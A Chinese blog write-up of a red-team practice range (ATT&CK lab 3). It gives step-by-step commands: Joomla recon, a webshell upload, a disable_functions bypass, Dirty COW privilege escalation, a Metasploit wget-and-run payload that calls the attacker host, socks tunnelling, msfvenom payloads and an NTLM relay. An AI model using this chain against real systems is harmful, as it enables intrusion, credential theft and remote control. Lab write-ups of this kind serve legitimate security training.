【精选】ATK&CK红队评估实战靶场三(超详细思路过程)

2023-12-19

???? 博主介绍

????‍???? 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【ATK&CK红队评估实战靶场】 【VulnHub靶场复现】【面试分析】
????点赞➕评论➕收藏 == 养成习惯(一键三连)????
????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋
????作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

一、环境搭建

1.靶场下载

2.拓扑图

3.配置环境

二、外网渗透

1.信息收集

2.目录扫描

joomscan扫描

3.远程连接MySQL

4.getshell

5.LD_PRELOAD绕过

三、内网渗透

1.内网信息收集

信息收集总结:

2.ssh远程连接

3.脏牛提权

4.msf,监听

5.msf后渗透

6.基于EarthWorm的正反向socks5代理

1.我们首先要添加路由,转发sock代理

2.Socks5代理

四、横向移动

1.NTLM Relay 攻击

1.msf生成木马

2.抓取用户的Net-NTLM Hash的过程


一、环境搭建

1.靶场下载

靶场下载地址:
https://pan.baidu.com/s/1iy4MIy6ni6d9F3iypeCYVQ
提取码:7mhi

2.拓扑图

web-centos一进入:

service network restart 重启网络服务

3.配置环境

kali web-centos web-ubantu pc win 2008 win 2012
内网 192.168.93.100 192.168.93.120 192.168.93.30 192.168.93.20 192.168.93.10
192.168.43.157 192.168.43.57

二、外网渗透

1.信息收集

发现centos机器的外网IP地址是192.168.43.57

┌──(root????kali)-[~/桌面]
└─# arp-scan -l

┌──(root????kali)-[~/桌面]
└─# nmap -sS -A 192.168.43.57

扫描发现开放了22、80、3306端口

2.目录扫描

┌──(root????kali)-[~/桌面]
└─# dirsearch -u http://192.168.43.57 

需要输入账号密码,可以尝试弱口令,发现失败了

joomscan扫描
┌──(root????kali)-[~/桌面]
└─# joomscan -u http://192.168.43.57

版本joomla 3.9.12,可以利用msf的payload试试

还有很多目录,都可以扫描出来

想使用msf渗透,但是没有找到模块

/configuration.php~ 目录下面,找到了数据库的账户密码

想到开始端口扫描的时候,开放了3306端口,所以这里mysql是目前要尝试利用的地方

$user = 'testuser'
$password = 'cvcvgjASD!@'

3.远程连接MySQL

一般账号密码在数据库的user表中,直接检索,然后进行查找

发现这个是administrator最高用户,所以可以修改密码,然后进行登录

账号:administrator
密码:123456

也可以登录mysql,进行修改password

mysql -h 192.168.43.57 -u testuser -p

mysql> select * from am2zu_users;

update am2zu_users set password = md5("123456") where id = 891;  #修改password

4.getshell

点击 Bee3 Details and Files

写入getshell木马

木马上传的文件位置: /templates/beez3/

最终地址:

http://192.168.43.57/templates/beez3/error.php

连接蚁剑

打开终端,发现无法输入命令

查看phpinfo发现确实设置了 disable_functions

5. LD_PRELOAD 绕过

payload下载:

GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail) bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail) - GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail) icon-default.png?t=N7T8 https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

蚁剑的插件市场里面也有:

LD_PRELOAD绕过

把这个再上传进去,上传的目录一定要记住,后面传参的时候要用到

说明这台机器,我们就已经拿下来了

三、内网渗透

1.内网信息收集

ifconfig

uname -a  ##查看内核版本

whoami     #查看当前shell权限      www-data
id         #uid=33(www-data) gid=33(www-data) groups=33(www-data) 

信息收集总结:

我们可以发现,我们开始是打算渗透进入centos靶机,但是我们这里远程命令执行的命令,回显出来的信息都是ubantu的靶机的

上网查了资料才知道,原来是Centos是Ubuntu的反向代理,用的是 Nginx协议

最后在/tmp/mysql目录下找到了一个账号和密码

我们前面扫描centos靶机开放了22端口,我们这里可以尝试下ssh远程连接

adduser wwwuser
passwd wwwuser_123Aqx

2.ssh远程连接

┌──(root????kali)-[~/桌面]
└─# ssh wwwuser@192.168.43.57 

uname -an

┌──(root????kali)-[~/桌面]
└─# searchsploit linux 2.6.32

这里面有很多内核提权的方法,我尝试了几个,没有提权成功,我后来是用脏牛提权法

查看版本Linux内核版本信息,发现符合脏牛提权漏洞

3.脏牛提权

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)

在可执行目录下,一般在/tmp目录下

gcc -pthread dirty.c -o dirty -lcrypt  ##编译dirty.c

./dirty 123456

id       #显示用户的ID,以及所属群组的ID;uid=0,为root用户

su firefart  ##密码123456

4.msf,监听

我们目前需要:通过msf生成一个payload,在CentOS上运行此payload,建立 msf 和CentOS 的连接

kali 另外起一个msf,进行监听

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X


msf6 exploit(multi/script/web_delivery) > set target 7
target => 7

msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.43.157
lhost => 192.168.43.157
msf6 exploit(multi/script/web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.43.157   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Linux

输入run之后,会生成一个payload,然后复制在CentOS上执行

执行之后就会出现下图红框的中的内容

[firefart@localhost tmp]# wget -qO nPTCbkLP --no-check-certificate http://192.168.43.157:8080/KnZJ61asAFMH; chmod +x nPTCbkLP; ./nPTCbkLP& disown


5.msf后渗透

msf6 exploit(multi/script/web_delivery) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  1         meterpreter x64/linux  firefart @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0) @ localhost.l...  192.168.43.157:4444 -> 192.168.43.57:50264 (192.168.43.57)

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter >

6.基于EarthWorm的正反向socks5代理

参考博客:

基于EarthWorm的正反向socks5代理_socks5反向代理-CSDN博客 文章浏览阅读3.8k次,点赞3次,收藏9次。EarthWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处_socks5反向代理 https://blog.csdn.net/qq_44159028/article/details/122821861

1.我们首先要添加路由,转发sock代理
添加路由是为了能让msf程序进入内网,便于攻击

earthworm搭建socks5反向代理服务 是为了让kali(攻击者)的程序进入内网,可以扫描内网主机信息等

ew流量走向:本地流量–本地1080端口–web服务器1234端口(利用EW)-- 内网服务器 – web服务器的1234端口 – 本地1080端口

添加一个通向内网 192.168.93.0/24 网段的路由

route add 192.168.93.0 255.255.255.0 1
# 目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 1

2.Socks5代理

使用earthworm搭建socks5反向代理

ew下载:

https://github.com/idlefire/ew icon-default.png?t=N7T8 https://github.com/idlefire/ew

kali(攻击者)

./ew_for_linux64 -s rcsocks -l 1080 -e 1234
  #将1080端口监听到的本地数据转发到 web服务器的1234端口
  # 通过1080端口,将本地流量转发出去
  #rcsocks、rssocks 用于反向连接
  #ssocks 用于正向连接
  # -l 指定本地监听的端口
  # -e 指定要反弹到的机器端口
  # -d 指定要反弹到机器的IP
  # -f 指定要主动连接的机器 ip
  # -g 指定要主动连接的机器端口
  # -t 指定超时时长,默认为 1000

在CentOS上传 ew_for_linux64

./ew_for_linux64 -s rssocks -d 192.168.43.157 -e 1234
  #192.168.43.157 是攻击者kali的IP地址

再回到kali终端:

将socks5 服务器指向 127.0.0.1:1080

vim /etc/proxychains4.conf

这样我们就可以利用proxychains,将我们的socks5代理进去到内网中了

scanner进行扫描

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 5
run

四、横向移动

1.NTLM Relay 攻击

参考博客:

NTLM-relay攻击的原理与实现_ntlmssp攻击-CSDN博客 文章浏览阅读10w+次,点赞9次,收藏17次。CATALOGNTLM相关1.用处2.认证流程其他术语NT-hash/NTLM-hashLM-hashNet-NTLM hashSSPISSPNTLM-relay原理不同版本的NTLM认证对应的responseNTLM-relay攻击如何获取到NET-NTLM hash通过responder或者inveigh工具Inveighresponder破解NET-NTLM hash(v2)其它方式的NTLM-relay攻击利用impacket的ntlmrelayssmb协议访问:http协议访问参考文章NTLM相_ntlmssp攻击 https://blog.csdn.net/qq_41874930/article/details/108825010

工具使用说明:
impacket-master:为了伪造smb服务器,抓取用户的密码

msf:生成一个exe木马 ,结合impacket-master的smbrelayx.py使用

通过NTLM Relay伪造的SMB服务器拿到密码,利用msf拿下 win2008

大致的思路是:攻击者在CentOS上面伪造一个恶意的SMB服务器,当内网中有机器 Client1 访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给内网中的另一台机器 Client2

因此我们的思路就是通过msf生成的木马shell.exe,上传到CentOS,用smbrelayx.py执行,然后CentOS上就会生成 伪造的SMB恶意服务器,内网主机访问SMB并输入账号密码,CentOS的上的恶意代码smbrelayx.py就会抓取内网主机的 Net-NTLM Hash,返还给内网中的另一台主机(本案例中为win 2008(192.168.93.20)),并通过CentOS上的msf生成的shell.exe回传给kali(攻击者),然后内网目标主机通过msf的监听上线。

1.msf生成木马

首先利用msf的msfvenom模块生成一个exe后缀木马(开启远程桌面也是用到此模块)

msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.43.157 LPORT=4567 -e x86/shikata_ga_nai -f exe -o shell.exe
  #192.168.43.157 是kali的IP地址

然后将木马上传到centos靶机上

Impacket下载位置:

https://github.com/fortra/impacket/tree/master/examples icon-default.png?t=N7T8 https://github.com/fortra/impacket/tree/master/examples

然后进入Impacket的examples目录执行如下命令:

python3 smbrelayx.py -h 192.168.93.20 -e /tmp/shell.exe
  # 攻击信息都会反弹到192.168.93.20这台主机

但是这个靶机是没有python3的,所以要安装python3

wget -c https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz
tar -zvxf Python-3.6.9.tgz
cd Python-3.6.9
./configure --prefix=/usr/local/python --with-openssl
make && make install

ln -s /usr/local/python/bin/python3 /usr/bin/python3
ln -s /usr/local/python/bin/pip3 /usr/bin/pip

pip install --upgrade pip -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com
pip install six -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pycryptodomex 
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pyOpenSSL
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com ldap3
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com pyasn1
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com impacket

但是我这里一直报错说没用权限,所以没有成功

执行后会在CentOS上面启动一个smb服务和一个http服务,http服务会跟nginx的80端口冲突,所以需要事先停止nginx 服务:

nginx -s stop

执行完 python3 smbrelayx.py -h 192.168.93.20 -e /tmp/shell.exe 。此时,如果内网中的

有域用户访问再次通过CentOS代理访问站点时,访问的就不是之前的那个Joomla站点了,而是攻

击者在CentOS上面搭建的一个恶意的smb服务,会弹出一个认证页面:

2. 抓取用户的Net-NTLM Hash的过程

安全意识差的用户自然会输入自己的域用户密码,然后 smbrelayx.py 就会抓取到该用户的Net-

NTLM Hash并重放给内网中的另一台机器 192.168.93.20(Windows Server 2008) ,成功后,

会在Windows Server2008上面上传我们预先生成的木马shell.exe并执行。因为 smbrelayx.py 指定的是192.168.93.20这台主机

在msf上开启对 win 2008(192.168.93.20)的监听

然后在win7上访问smb服务器,使得win 2008成功上线

顺序不能错,一定要先开启监听,在用win7登录smb伪造服务器

win8进行监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.20
set AutoRunScript post/windows/manage/migrate
run

这样就获取到win 2008的权限,可以通过meterpreter 对win 2008进行后渗透

由于这里是靶机,所以手动完成该域用户的认证过程,就用 PC (Windows7) 上的用户访问吧。输入

用户名密码后,smbrelayx.py成功抓取到该用户的 Net-NTLM Hash

这样就获取到win 2008的权限,可以通过meterpreter 对win 2008进行后渗透

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

【精选】ATK&CK红队评估实战靶场三(超详细思路过程) 的相关文章

  • 没有 Web 表单的 PHP POST 数据[重复]

    这个问题在这里已经有答案了 有没有一种方法可以在不使用 Web 表单的情况下发送 POST 数据 我正在与第 3 方支付处理商合作 我可以选择手动提交付款 但数据需要采用 POST 格式 我计划将我的脚本作为 CRON 作业运行 因此由于它
  • Node.JS Schema.pre('save) 不更改数据

    我正在制作用户授权系统 并希望在将密码保存到数据库之前对其进行哈希处理 为了达到这个目的 我使用 bcrypt nodejs 上面标题中的问题 var mongoose require mongoose var bcrypt require
  • 为什么我的 WebClient 大多数时候会返回 404 错误,但并非总是如此?

    我想要获取有关我的程序中的 Microsoft 更新的信息 但是 服务器在大约 80 的情况下会返回 404 错误 我将有问题的代码归结为这个控制台应用程序 using System using System Net namespace W
  • Wt C++ Web 框架的主机,部署问题

    我想知道 justhost com 是否足以托管 Wt C 网站 应用程序 它确实允许 FTP 和 SSH 访问http richelbilderbeek nl CppWtDeployGlobalHosted htm http richel
  • 使用元 http-equiv 标记进行重定向时,避免将页面添加到浏览器历史记录中

    我有一个网页 它使用以下命令重定向到所需的目标网址 我想避免第一页出现在浏览器历史记录中 特别是 在手机 Android iOS 等 中 我希望后退按钮可以跳过重定向页面 您有两个选择 要么使用真正的 HTTP 重定向 要么使用 JavaS
  • 如何使用 FastAPI 返回 HTMLResponse

    是否可以在端点显示 HTML 文件 例如用户正在访问的主页 是的 FastAPI 可能有HTMLResponse 您可以返回一个HTMLResponse from fastapi import FastAPI from fastapi re
  • 当指定为对象属性时,IIFE 如何影响其中的此关键字

    var a name Rhona check function return this name console log a check This returns 一个空字符串我希望它返回 Rhona 它没有给出 undefined 或 n
  • 如何在没有服务器或服务器端脚本的情况下创建动态访问数据库的内联网网站?

    问题是 必须在没有服务器托管的情况下创建 Intranet 网页 并且我一直在尝试使用 HTML 和 javascript 更新 Access 数据库 但这不适用于以下代码 请帮助 当以下代码从 Visual Studio 运行时 出现错误
  • 如何使用 mysql 从 php 中的表中返回多行

    我决定为我的家人建立一个梦幻足球网站 但我无法从数据库返回多行 我想要的 进行一次 sql 调用并获取整个玩家列表 以便我可以填充一个对象或对象列表 如果整个桌子都可以归还那就太好了 我的目标是简单地向用户显示待选秀的可用球员列表 目前 通
  • 使用 ruby​​ on Rails 向静态网站添加功能

    我是 ruby on Rails 的新手 我有一个包含很多静态页面的网站 我想向网站添加一些动态页面 我将在 ruby on Rails 中开发这些页面 当用户单击静态页面之一上的按钮之一时 将触发这些页面提供的功能 我想我将把动态页面放在
  • 表单标签的 CSS 样式

    据我所知 一个
  • REST API 与 Web API

    我是构建 HTTP API 的初学者 我似乎对 REST API 和 Web API 之间的区别感到困惑 我在网上读到更多相关内容 困惑似乎越来越多 我猜菲尔丁有与此链接相同的问题http roy gbiv com untangled 20
  • VM1550 installHook.js:1860 在控制台中记录为双行

    我正在使用反应应用程序并构建一个简单的应用程序 当我使用 console log 方法在控制台上记录某些内容时 控制台上会出现第二条日志 它似乎来自第 1860 行的文件名 installHook js 我已经尝试过寻找它 但我没有找到 我
  • 将网页中的表格导入 Excel

    我只有中高级的Excel水平和中级的VBA与Excel背景 我想要做的是从链接中显示的网页导入表格 http www admission unmsm edu pe res20130914 A 011 0 html http www admi
  • 网页编码,设置矛盾[重复]

    这个问题在这里已经有答案了 如果一个网页有 但http标头有 Content Type text html charset UTF 8 那么假设什么编码呢 在 HTML5 中 优先级定义为 用户浏览器设置 字节顺序标记 HTTP 标头 or
  • 通过站点到站点 VPN 将 Azure 网站连接到本地数据库

    我的目标是运行一个天蓝色的网站 该网站可以访问我们本地公司数据库中的数据 我按照网络上的教程设置了一个 Azure 虚拟网络 并通过站点到站点 VPN 将其连接到我们本地公司网络 在天蓝色门户中 我可以看到连接实际上正在工作 并且数据已被接
  • 如何将 html 输入到 Flask 中?

    我有这个 html 位
  • 创建默认应用程序时 FirebaseOptions 不能为 null

    我正在尝试在 Flutter 集成电子邮件和基于 google 的登录中尝试一个示例项目 并计划使用 firebase 初始化来执行此操作 同时我已按照教程中提到的所有步骤进行操作 一旦尝试使用 firebase 我就会收到此错误已初始化
  • 单击链接时启动本地应用程序

    我正在开发一个内部 Web 应用程序 它允许我为客户存储远程控制凭据 每次我想要连接到客户计算机时 我都需要启动远程支持软件 复制并粘贴用户名和密码 然后单击 开始 按钮 该软件将具有可用的命令行参数 允许我立即启动会话 但是 我不知道如何
  • 如何在odoo中重写js函数

    我想加载 shop checkout url 函数是 odoo define change info order website sale change info order function require use strict oe w

随机推荐

  • Typora+Picgo(正常) 却上传图片失败问题解决思路和办法

    报错信息 在typora中粘贴图片时报错 显示上传图片失败 有点奇怪 而我确定我的picgo正常且通过了测试 那我们就去看日志 跟踪排查问题在哪里 我的picgo日志文件路径在 D user username Application Dat
  • Vue中英文翻译小结

    背景 时局艰难 后端开发被强制写了vue 这不有个需求是中英文翻译 特此记录下 该怎么个翻译法子 先引入全局的路由国际化文件 zh js 和 en js 1 关于插值表达Button里面 t reinsop common back 2 关于
  • onvif协议笔记

    一 简介 ONVIF官网 ONVIF协议网络摄像机 IPC 客户端程序开发 1 专栏开篇 onvif协议开发 二 gSOAP gsoap官网 1 下载和编译 下载地址 bin sh 指定源码目录 解压源码 GSOAP SRC gsoap 2
  • nacos启动 java.net.UnknownHostException: jmenv.tbsite.net

    只做记录 地址在这 windows 双击执行startup cmd文件 默认是以集群方式启动nacos 由于只想用单体的并没有配置集群相关的属性 所以无法启动 解决方式1 在命令行输入startup m standalone以单机模式启动就
  • 冬日路亚,寒冬中的收获【钓鱼博客】12.17日

    12月17日 南京 桦树钓场 晴 气温 零下4度到0度 虽屋外寒风刺骨 但钓鱼佬实在是压不住心里想钓鱼的冲动 我还是出发了 才抛几竿 出线孔和鱼竿导线孔结冰 以上阿尔法渔轮的导线规由于线上有水导致结冰冻上了 中鱼出线视频 轮子咔咔出线 渔获
  • 黑马程序员《PHP基础案例教程》第2版课后练习—第03章

    第3章课后练习 答案均参考教材官方发布的PPT 以下是下载PPT的页面 人民邮电出版社教育社区 PHP基础案例教程 第2版 图书 人邮教育社区 一 填空题 1 定义函数使用的关键字为 function 2 用于对字符串中的某些字符进行替换操
  • 密码学上的经典瞬间:如果当时有Python

    提到 安全 首先想到的一定是加密 在如今的互联网环境中 信息加密无处不在 我们早已习惯 甚至毫无感觉 比如 通过https协议访问的各个网站的内容 QQ 微信等聊天工具之间互相发送的信息等等 都是经过加密处理的 前几天看了一篇介绍密码学历史
  • Linux CentOS7安装harbor

    1 下载harbor离线包 wget https github com goharbor harbor releases download v2 4 2 harbor offline installer v2 4 2 tgz 2 解压安装
  • Fortinet在“IDC MarketScape: 中国软件定义广域网基础设施2023年厂商”评估中位居“领导者”类别

    近日 IDC MarketScape 中国软件定义广域网基础设施2023年厂商评估 正式发布 该报告通过 IDC MarketScape 厂商评估模型对中国SD WAN基础设施厂商进行了评估 Fortinet 在该报告中位居 领导者 类别
  • 常见的6种软件测试用例设计方法

    常见的软件测试用例设计方法 个人认为主要是下面这6种 流程图法 也叫场景法 等价类划分法 边界值分析 判定表 正交法 错误推测法 这6种常见方法中 我分别按照定义 应用场景 使用步骤 案例讲解这4个部分进行讲解 所以本文行文结构如下 每种用
  • 【正式服部署】安装Nginx

    正式服部署 安装Nginx 千寻简笔记介绍 千寻简文库已开源 Gitee与GitHub搜索 chihiro doc 包含笔记源文件 md 以及PDF版本方便阅读 文库采用精美主题 阅读体验更佳 如果文章对你有帮助请帮我点一个 Star 更新
  • 系列十一、索引

    一 索引 1 1 概述 索引 index 是帮助 MySQL 高效获取数据的有序数据结构 在数据之外 数据库系统还维护着满足特定查找算法的数据结构 这些数据结构以某种方式引用 指向 数据 这样就可以在这些数据结构上实现高级查找算法 这种数据
  • 智慧养老:创新科技让老年生活更美好

    智慧养老 创新科技让老年生活更美好 随着人口老龄化的加剧 智慧养老成为了关注焦点 智慧养老以创新科技为核心 旨在改善老年人的生活品质 促进健康 增强安全感和社会融入感 本文将详细介绍智慧养老的关键技术和应用场景 带您了解智慧养老的发展趋势和
  • UI 易用性测试 以及自动化实现!

    GUI 是指图形用户界面 UI 是指用户界面 对于纯软件系统 这两者没有本质的区别 GUI易用性测试与 UI 易用性测试内容一致 但是如果测试的对象是一个产品 这两者则存在区别 对于产品 UI 则不仅仅包括 GUI 还包括产品硬件部分的测试
  • 华为认证 | 专科考HCIE有用吗?

    当然可以 HCIE认证 对考生的学历 专业等没有任何要求 考生可以直接进行考试的报名 考试报名可以通过Pearson VUE官网 或者是直接前往考试中心所在地 向工作人员直接申请考试报名 01 专科考HCIE真的很有用吗 华为认证被越来越多
  • JAVA四大权限修饰符

    1 四大权限修饰符 public private default protected是java的四大修饰符 下面分别主要介绍四者之间的区别 1 1 public 公共的 public是权限最大的修饰符 他可以修饰类 成员变量 成员方法 构造
  • 通过全流量分析Web业务性能好坏

    随着全球商业环境的不断发展和变化 业务性能的重要性愈发凸显 无论是传统实体企业还是纯线上企业 业务性能都是其核心竞争力和稳定运营的关键要素 良好的业务性能不仅可以提升客户满意度 增加市场份额 还可以降低成本 提高效率 本文章目的为探讨基于B
  • 不做数据采集,不碰行业应用,专注数字孪生PaaS平台,飞渡科技三轮融资成功秘诀

    12月15日 飞渡科技在北京举行2023年度投资人媒体见面会 全面分享其产品技术理念与融资之路 北京大兴经开区党委书记 管委会主任常学智 大兴经开区副总经理梁萌 北京和聚百川投资管理有限公司 以下简称 和聚百川 投资总监严玉婷 北京天穆私募
  • 【Proteus仿真】【Arduino单片机】定时智能插座开关

    文章目录 一 功能简介 二 软件设计 三 实验现象 联系作者 一 功能简介 本项目使用Proteus8仿真Arduino单片机控制器 使LCD1602液晶 DS18B20温度传感器 按键 蜂鸣器 继电器开关 HC05蓝牙模块等 主要功能 系
  • 【精选】ATK&CK红队评估实战靶场三(超详细思路过程)

    博主介绍 博主介绍 大家好 我是 hacker routing 很高兴认识大家 主攻领域 渗透领域 应急响应 ATK CK红队评估实战靶场 VulnHub靶场复现 面试分析 点赞 评论 收藏 养成习惯 一键三连 欢迎关注 一起学习 一起讨论